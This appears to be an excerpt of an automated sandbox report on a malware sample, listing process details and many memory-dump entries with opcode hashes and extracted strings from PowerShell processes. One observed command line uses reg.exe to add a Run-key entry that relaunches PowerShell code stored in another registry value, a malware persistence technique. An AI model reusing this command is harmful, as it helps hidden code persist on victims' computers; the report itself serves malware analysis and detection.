                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:11
                                          Start time:12:12:32
                                          Start date:18/11/2024
                                          Path:C:\Windows\SysWOW64\reg.exe
                                          Wow64 process (32bit):true
                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)"
                                          Imagebase:0x340000
                                          File size:59'392 bytes
                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Reset < >
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892362887.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b059cd5a9e99a9490555d4c79285c1a099c056849d2d967fa2699cab449c08f9
                                            • Instruction ID: 4f1df60da6e33193247aa8e2d3dc589f4693a47c09c5ef09c6c69dd1844516a6
                                            • Opcode Fuzzy Hash: b059cd5a9e99a9490555d4c79285c1a099c056849d2d967fa2699cab449c08f9
                                            • Instruction Fuzzy Hash: B8D18430A19A4E8FEBA8DF28C8557E977E1FF58300F14426EE81DC72A5DF7499448B81
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892362887.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7b2ede609198073a5214cbe929b2910405198dc360a9b07b8adca0f2f9ff982
                                            • Instruction ID: d78c27696c16bcbb36795c81fbb409281be0f7f1a71a38385111958a05e17729
                                            • Opcode Fuzzy Hash: b7b2ede609198073a5214cbe929b2910405198dc360a9b07b8adca0f2f9ff982
                                            • Instruction Fuzzy Hash: 66D17330A19A4E8FEBA8DF28C8657E977D1FB58310F54827ED81DC72A5CF7499408B81
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892362887.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64a58470811b0c4118e11cb9cd05b2a38acb3848e7191a05c084356b81025424
                                            • Instruction ID: 9a24722df4b0dbdcbb89b74b599298ec4affbc93bb218b230abac3cf085e2c34
                                            • Opcode Fuzzy Hash: 64a58470811b0c4118e11cb9cd05b2a38acb3848e7191a05c084356b81025424
                                            • Instruction Fuzzy Hash: 43228230A18A4D8FEF98EF5CC495AA977E1FFA8314F10426DE059D7295CB75E881CB80
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f1e99b58c070485eebc6b332337d9dc8bb401c90a14a7f1272a541c36c2d913
                                            • Instruction ID: 9f29ef1ccf7dc47c4d5875abd18df8c5ff4067dac4f615d9ef717992cd4aa4bf
                                            • Opcode Fuzzy Hash: 9f1e99b58c070485eebc6b332337d9dc8bb401c90a14a7f1272a541c36c2d913
                                            • Instruction Fuzzy Hash: 48C14C21B0EE8E0FEBA6966848685B47BD1EF55314F0901FBD58DCB1E3DE28AD05C391
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892362887.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b26e10095265f89c5406d7b5df00fd5925ef0e0e96d3226b5b46e5602c3a94f
                                            • Instruction ID: 58805cf2c7ee2dcf97abde3992a920e1a13acacc5a26ac3e0550be299f7ca199
                                            • Opcode Fuzzy Hash: 3b26e10095265f89c5406d7b5df00fd5925ef0e0e96d3226b5b46e5602c3a94f
                                            • Instruction Fuzzy Hash: C8917330A19A4D8FDBA8DF28C4657E977E1FF58310F50423EE85DC7295CE7499408B82
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5dbeaa1f03278298d0816825fe5a7aa975ab141e6316ff0a75fadb134c9cc02c
                                            • Instruction ID: b42e7fc939025e0c8b64e1dbae58b886932f9972a0cc83a2e0fb345d13be7051
                                            • Opcode Fuzzy Hash: 5dbeaa1f03278298d0816825fe5a7aa975ab141e6316ff0a75fadb134c9cc02c
                                            • Instruction Fuzzy Hash: 92515922B0EF890FEB64EA6848655A877E1FF55328F0501FED19CC71E3CE246D448341
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66d17d3c4ba95718dc4ee772aacdd4b227d7be170bd75a9b0a8bdac148504bdf
                                            • Instruction ID: fbca8c6c591e944b9f064394a4d7d91946a806da36977717f3fcf8334972dbf9
                                            • Opcode Fuzzy Hash: 66d17d3c4ba95718dc4ee772aacdd4b227d7be170bd75a9b0a8bdac148504bdf
                                            • Instruction Fuzzy Hash: 8F515B72A0EB890FEBA9EA5848752A877E1FF55314F1500FED08CC71E3DE286D048741
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f2fb268d011f3dbbe5431388e7b7f82f13fd16475d39be694f89535b15c6621
                                            • Instruction ID: 971d28e5aa8419e53efe9a615a2a4cebb041a4fcaac99bbb94ab604149050922
                                            • Opcode Fuzzy Hash: 2f2fb268d011f3dbbe5431388e7b7f82f13fd16475d39be694f89535b15c6621
                                            • Instruction Fuzzy Hash: C2512962B0EEC90FEBA99AA844752A87B91FF55228F1901FED19CC71E3DD287D058341
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6fb158754a0fb5d8f57f33c100599e37450c04e7740ecbdf9ff0650572a15968
                                            • Instruction ID: 6b47ed1fc808210ca4e0433bba1018fc631e79c6867cb75535fec62eb7f55972
                                            • Opcode Fuzzy Hash: 6fb158754a0fb5d8f57f33c100599e37450c04e7740ecbdf9ff0650572a15968
                                            • Instruction Fuzzy Hash: CD411C21A0EFC94FDB529B6444A95A47FE1FF56314B0A00FBD58CCB1E3C928AD45C711
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892362887.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: edaf018e03d49ffa34aa6d66ca23bbd4217baf8bb4fd4d5a5b167805a143b206
                                            • Instruction ID: 757fe9ef5c8b2a64e5d13a91eb9cad9a37e6539c03d307a62e9369c3ce7384b8
                                            • Opcode Fuzzy Hash: edaf018e03d49ffa34aa6d66ca23bbd4217baf8bb4fd4d5a5b167805a143b206
                                            • Instruction Fuzzy Hash: 96314230A1A65D9EFFB4AF55CC66FF93290FF41319F810139D42D860A2CAB86A45CF01
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4561acc1016bd9e81baea4c6903148aa3166cee27a33c26bd3db00a8f73c727
                                            • Instruction ID: 0ca17ef0b15b96aa682ef29ad30de49f6b03bf204c5fb05d2d527112a0606ad5
                                            • Opcode Fuzzy Hash: a4561acc1016bd9e81baea4c6903148aa3166cee27a33c26bd3db00a8f73c727
                                            • Instruction Fuzzy Hash: DE213A22F1EE4E0FE3A9AA6C587557466C2FF94328B5901BEE01CC71E7DE28EC014240
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 91265fe760a19e67318b365d5e1a8cc6decea30c8621e201b0fa929556c26f93
                                            • Instruction ID: 12a6ebb0a36f0458f0a828d07aa1a25a0c60693f71c736ec82b7a07ac7cd4579
                                            • Opcode Fuzzy Hash: 91265fe760a19e67318b365d5e1a8cc6decea30c8621e201b0fa929556c26f93
                                            • Instruction Fuzzy Hash: DE01DB22F1FD5D0FE7B5AA9C28255B462D1FF58764B5501F7F41CC71D6DD18AC044281
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bca900f334b4f12e935ad6b098bf13d7eea85877ee4c53f18939d2d714fec1ed
                                            • Instruction ID: 6caa50648d374e809f74348fb94c7134f5ff65b51f6da06b7813c8831166aaf4
                                            • Opcode Fuzzy Hash: bca900f334b4f12e935ad6b098bf13d7eea85877ee4c53f18939d2d714fec1ed
                                            • Instruction Fuzzy Hash: FC11A561B0FECA1FE7A6E6684CA18657BD1EF15214B0905FAD48DCB1E7D828AD488381
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892362887.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction ID: fc19d33b7a865a8bc8530f5ce46123394b734ce7341a977b23e4d886467abca5
                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction Fuzzy Hash: 1501A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10066EE58AC36A5DA32E881CB45
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: aa15188f518468a2aa7edd8127f678cbd05225d19f6a553ed53765a4bbc23860
                                            • Instruction ID: 4bc20e40871090106c244a77272f1e46cd7f50331a7b5ded6197f3d662722928
                                            • Opcode Fuzzy Hash: aa15188f518468a2aa7edd8127f678cbd05225d19f6a553ed53765a4bbc23860
                                            • Instruction Fuzzy Hash: ACF02722B1ED0D0BE795926C28152F472C2EFC4135F561277D16EC31A6ED25D8474280
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd54b77289545f9cc5d2d2e3968c7c362075c5016756bc56d7e52803f6897734
                                            • Instruction ID: 919f56e2a0cac17031cac8d1258dc32d8479d952fcde4c78a5b469516c4f8277
                                            • Opcode Fuzzy Hash: cd54b77289545f9cc5d2d2e3968c7c362075c5016756bc56d7e52803f6897734
                                            • Instruction Fuzzy Hash: 14E0DF33B0FA090AFB5C695C2C220F8B3C1EF84238B44147FD25EC20CBE82AA8160285
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1892810342.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9bb80000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 187e96b4f0bcfad88706bf521e9872368ae37caf97bc41ac8b9220ed54be9ae1
                                            • Instruction ID: 60646fae1d288ef9f1e09a982ac3831cd7babecc9a1a1e8bb6cfb3c07d259256
                                            • Opcode Fuzzy Hash: 187e96b4f0bcfad88706bf521e9872368ae37caf97bc41ac8b9220ed54be9ae1
                                            • Instruction Fuzzy Hash: 8EE09253B0F9894FE795BA7C186A46866D0EF996A4B1444BBE04CC71E7DD185C0D4341
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1962736163.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_4ab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \VDm
                                            • API String ID: 0-1874373344
                                            • Opcode ID: caef27b4e0b5a38e6be825f23e7feec84fd4e77acb80e3da2c63a4b4ae5332fd
                                            • Instruction ID: 1b3e1af24e76cb9bdb75316dd2df5c61252d3f8c4eb74c246c5cf6ad9017837a
                                            • Opcode Fuzzy Hash: caef27b4e0b5a38e6be825f23e7feec84fd4e77acb80e3da2c63a4b4ae5332fd
                                            • Instruction Fuzzy Hash: B0B15B70E00209CFDB14CFA9C9857EEBBF6BF88315F148529E855E7295EB34A845CB81
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1962736163.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_4ab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45716c65e07657fd6548c3b289e07917bf600ba1151008c968d0f07bf1ca1fe4
                                            • Instruction ID: 67984b35562b3c637df537487491a56ade7e4195762d39cc69ba29f331254ca2
                                            • Opcode Fuzzy Hash: 45716c65e07657fd6548c3b289e07917bf600ba1151008c968d0f07bf1ca1fe4
                                            • Instruction Fuzzy Hash: 72B16E70E002098FDF14CFA9DD817DDBBF6AF88314F188529E855EB295EB74A841CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq
                                            • API String ID: 0-3253322148
                                            • Opcode ID: 20b8031e010a29aae85dc8113b73990156c73fd2e0ec9f6be535c4c1aac57dfe
                                            • Instruction ID: 8ce3aeaccb5c0017b2c5804dec8d03474d79f7d468af66cff3db3e10fb29c0f7
                                            • Opcode Fuzzy Hash: 20b8031e010a29aae85dc8113b73990156c73fd2e0ec9f6be535c4c1aac57dfe
                                            • Instruction Fuzzy Hash: 597283B0E40215DFDB64DBA8C851B6ABBB2BF85344F24C5A9D909AB741CB31EC41CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (fl$(fl$(fl$(fl$(fl$(fl$4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-3282130832
                                            • Opcode ID: 1b4315ce5ee39c870e82f847f817a605de3a349ceb86a9af173ec29b059d728d
                                            • Instruction ID: 782c2cc6589b7ae96559cf61ccfc41130ef8d034920f8239c314d552bf6d9e7a
                                            • Opcode Fuzzy Hash: 1b4315ce5ee39c870e82f847f817a605de3a349ceb86a9af173ec29b059d728d
                                            • Instruction Fuzzy Hash: 8782BCB0B002469FCB54EFA8C440B6ABBF2AF85354F14C469D9099F755CBB1EC46CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1962736163.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_4ab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8NDm$Hjq$h]Dm$h]Dm$h]Dm$$fq$$fq$IDm
                                            • API String ID: 0-933603392
                                            • Opcode ID: de80b113c6384f32e6ad56790c8aca1fb155091307a5d739dfaf09dac9f6a89f
                                            • Instruction ID: 4e347bb52b78dc6a830b1b6a71c4e84c91147a75423d6d557dcab137181bc81d
                                            • Opcode Fuzzy Hash: de80b113c6384f32e6ad56790c8aca1fb155091307a5d739dfaf09dac9f6a89f
                                            • Instruction Fuzzy Hash: AE225034B002148FDB25DF64D954AEEB7B6AF89304F1480A9D54AAB3A1CF35ED81CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq
                                            • API String ID: 0-332123906
                                            • Opcode ID: 1b2e9bb20ccb366a23482165c092f317ddfd20d19a66aded0c2de5d6370619d7
                                            • Instruction ID: cc5ee30b4c4139be3b664b42f82e08d78fcd6d68a781449dd3d2e75bcce4ee7f
                                            • Opcode Fuzzy Hash: 1b2e9bb20ccb366a23482165c092f317ddfd20d19a66aded0c2de5d6370619d7
                                            • Instruction Fuzzy Hash: 0FB169B16043859FCB51AB68C854766BFB5BF86351F2884ABE844CF293CB31DC41C762
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
                                            • API String ID: 0-1373546133
                                            • Opcode ID: ed389570afc2e2faf0da8d2d2a382922588b58add0bb7eb8f1a1aafee436b1b6
                                            • Instruction ID: 613e3910f2a682e4561f465257dbfacc8acec8817c57352bf65d065475db15f1
                                            • Opcode Fuzzy Hash: ed389570afc2e2faf0da8d2d2a382922588b58add0bb7eb8f1a1aafee436b1b6
                                            • Instruction Fuzzy Hash: 5BD1B3B0A102059FDB48EBA8C491B5EBBB3AF85344F25C419D906AF751CF71EC41CB96
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (fl$(fl$4'fq$4'fq
                                            • API String ID: 0-2329662379
                                            • Opcode ID: 6a13558d2ea0b040f1cb0efd7147e6508078d073b8e02e478e51c41e281850cf
                                            • Instruction ID: 3f088bdb11f1bc59761be3a76d20e09aaf717588a6297893bd82902da186ed4a
                                            • Opcode Fuzzy Hash: 6a13558d2ea0b040f1cb0efd7147e6508078d073b8e02e478e51c41e281850cf
                                            • Instruction Fuzzy Hash: EBF183B0A00214AFDB54DB68C951B5ABBB3AF84304F15C4A5E909AF791CF71ED818F91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (fl$(fl$(fl$(fl
                                            • API String ID: 0-2641983618
                                            • Opcode ID: 6eea9a81bc21b238b9cf255cf7f7e28b3aede20be31ab061e240731ef441f43a
                                            • Instruction ID: 6da616ebdd1197a49105a3aa952861e76da6360426098b3412c72d218e2e5538
                                            • Opcode Fuzzy Hash: 6eea9a81bc21b238b9cf255cf7f7e28b3aede20be31ab061e240731ef441f43a
                                            • Instruction Fuzzy Hash: 63B1B4B0B40305EFDB54EBA8C495B5EBBE3AF89344F118468E905AF750CB71EC518BA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq
                                            • API String ID: 0-3646979650
                                            • Opcode ID: 131334984881478b2c94cba763e368e8cf13374f8c2201371f3134dd68a65d44
                                            • Instruction ID: bb212cdb1bcc365134c30e2ad7a860f4fc01e63ba0bd57fa5bf657e516a4e704
                                            • Opcode Fuzzy Hash: 131334984881478b2c94cba763e368e8cf13374f8c2201371f3134dd68a65d44
                                            • Instruction Fuzzy Hash: 66B1A1B0A403059FDB58EBA8C441B9ABBB3EF85344F25C419D9066F351CB71EC41CBA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $fq$$fq$$fq
                                            • API String ID: 0-837900676
                                            • Opcode ID: 03c49fa21ed49df299789a05701f17cd61770b36d4fee0df6a96295bb989c38e
                                            • Instruction ID: 0cab17ed6175ede05fa01e34627a4d8f38c4ca0dbf22d8bccfbd65ec32111d71
                                            • Opcode Fuzzy Hash: 03c49fa21ed49df299789a05701f17cd61770b36d4fee0df6a96295bb989c38e
                                            • Instruction Fuzzy Hash: A7413BF6B402159BCBA4AFA9C94026BF7E9BFC5350B28842ACD09E7241DF31D945C7D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (fl$(fl
                                            • API String ID: 0-997382513
                                            • Opcode ID: a22ce4e02fb58c4d257306c4c9990b914b78aa7e02d904f1b2d1cc9724579e7b
                                            • Instruction ID: a0c0d522c0b79c5104bff53e5ce97d06a9571e21fe3c4b04287d151b7669ea71
                                            • Opcode Fuzzy Hash: a22ce4e02fb58c4d257306c4c9990b914b78aa7e02d904f1b2d1cc9724579e7b
                                            • Instruction Fuzzy Hash: 412267B4A40242DFDB94DF98C440B6ABBB2BF84344F15C469E9099F355CBB2EC46CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (fl$(fl
                                            • API String ID: 0-997382513
                                            • Opcode ID: 6f5064de1af17774eb603e556fb67b37e21410304846f865c35092560e9547d8
                                            • Instruction ID: 45975746352586fe95e999dc4ae0740e1b795641db446aa300e72b455ff35874
                                            • Opcode Fuzzy Hash: 6f5064de1af17774eb603e556fb67b37e21410304846f865c35092560e9547d8
                                            • Instruction Fuzzy Hash: 23A1BCB0A40301EFDB54EB68C484B9ABBF2AF89344F118469E905AF751CB72EC51CB61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1962736163.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_4ab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \VDm$\VDm
                                            • API String ID: 0-2679500123
                                            • Opcode ID: b7f42a68b54a14f47e8569dc2381a2ad70d9568c3b3c3ab54c1bc9f6177b49e4
                                            • Instruction ID: bc6571c8d8535d2d04b52a73d5535218cb3db600bb4f00eedc9af1ae75614c45
                                            • Opcode Fuzzy Hash: b7f42a68b54a14f47e8569dc2381a2ad70d9568c3b3c3ab54c1bc9f6177b49e4
                                            • Instruction Fuzzy Hash: 57718B70E006099FEB10CFA9D9807DEBBF5AF88314F188529E454E7265EB34A841CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1996888114.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: tPfq$tPfq
                                            • API String ID: 0-2659045182
                                            • Opcode ID: 63882703439b7be6cf480de4432d03c31a8cc18d309c7eadf998c9221db9070b
                                            • Instruction ID: d5e0c8fcdff9ae4f8fcc50cf977b37a66b1fc9c266d1c29af7d270f0e08a10a0
                                            • Opcode Fuzzy Hash: 63882703439b7be6cf480de4432d03c31a8cc18d309c7eadf998c9221db9070b
                                            • Instruction Fuzzy Hash: F5518CB27043459FCB519BB9C810A6BFBE5AFC2364F18C47BD545CB291DA32C849C3A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1962736163.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_4ab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \VDm$\VDm
                                            • API String ID: 0-2679500123
                                            • Opcode ID: 282a3e160b658c163e14bd9a49149adceee3078f7ae75c5613a01b3ea3de30b3
                                            • Instruction ID: 529a53a43c8fd21e902a68e47f90d4fbc85404274a2070490bb6d0f6ba09ca30
                                            • Opcode Fuzzy Hash: 282a3e160b658c163e14bd9a49149adceee3078f7ae75c5613a01b3ea3de30b3
                                            • Instruction Fuzzy Hash: E2717B70E006099FEB14CFA9D9807DEBBF6AF88314F188529E554E7365EB34A841CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.1962736163.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_4ab0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: h]Dm$IDm
                                            • API String ID: 0-2094575865
                                            • Opcode ID: 8e57e64356bea092213096ff1d2b85a523f9f52effc98fb1bccc8f2cde38b653
